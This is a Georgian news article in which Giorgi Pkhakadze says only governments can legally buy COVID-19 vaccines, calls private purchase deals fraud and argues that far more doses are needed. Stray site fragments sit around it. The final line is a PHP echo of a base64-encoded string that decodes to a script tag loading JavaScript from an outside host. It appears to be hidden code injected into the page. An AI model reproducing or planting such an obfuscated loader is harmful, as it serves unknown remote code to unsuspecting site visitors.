celsiusi
ავერსი საქკაბელი
პროფესორის, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი ფხაკაძის განცხადებით, ვაქცინების შესყიდვა ლეგარულად შეუძლიათ მხოლოდ და მხოლოდ სახელმწიფოებს და არა კერძო კომპანიებს . ამის შესახებ ფხაკაძემ საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა. 
 
“კერძო კომპანიები ვერ შეისყიდიან ვერანაირ ვაქცინებს. არ მინდა ეს ხალხი დავასახელო, ეს სპეკულაცია საქართველოში რომ ვიღაც კომპანიები, ვიღაცასთან აწარმოებენ მოლაპარაკებას ვაქცინების შეძენაზე ეს არის აფერისტობა , ეს არის დანაშაული და ვიღაცეების მცდელობა, არაკანონიერი გზით რაღაც ყალბი ვაქცინები შემოიტანონ.
 
რაც შეეხება სახელმწიფოს მიერ დაანონსებული 1 მილიონი დოზა “ფაიზერის” ვაქცინის შემოტანას, ეს სასიხარულო და კარგი ამბავია, დაველოდოთ, მოლაპარაკება არის მოლაპარაკება, იქ არის კომერციული საიდუმლოებები, იქ არის გადასარიცხი თანხები და ა. შ მაგრამ არის მეორე მომენტიც , მსოფლიოში არის ვაქცინების ნაკლებობა და თუ ჩვენი სახელმწიფო შეძლებს მილიონი დოზა ფაიზერის შეძენას ეს მისასალმებელია და სასიხარულო, მაგრამ რამდენად არის შესრულებადი ვნახოთ. ვფიქრობ, ნაკლებად შესრულებადია, მე მაინც  იმედი მაქვს რომ ეს ხელშეკრულება განხორციელდება”, - აცხადებს ფხაკაძე. 
 
ფხაკაძის თქმით, 50 ათასი ადამიანის, ან 100 ათასის აცრა, ვაქცინაციას არ ნიშნავს და ეს უნდა გვახსოვდეს. 
 
“საქართველოში მოხდა ინტერპრეტაცია არასწორად თუ რას ნიშნავს ვაქცინაცია. აქ საუბარია 1 მილიონ დოზაზე კი არა მინიმუმ 2- 2, 5 მილიონი ადამინი უნდა იყოს აცრილი ქვეყანაში მინიმუმ 90 % პროცენტი 18 წელს ზევით. იმისთვის რომ ამ რაოდენობის ადამიანები 2 ჯერ იყვნენ აცრილი და არ დაგვავიწყდეს რომ 5 თვეში მესამე დოზაა საჭირო, საჭიროა მინიმუმ6 მილიონი დოზა ვაქცინის შემოტანა და  ნაკლები ციფრები ეს არის კეკლუცობა და არა ვაქცინაცია. ამიტომ ვინც როგორც უნდა ისე გამაკრიტიკოს ვაქცინაციის პროცესი საქართველოში არ დაწყებულა”- განაცხადა გიორგი ფხაკაძემ .
4446
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");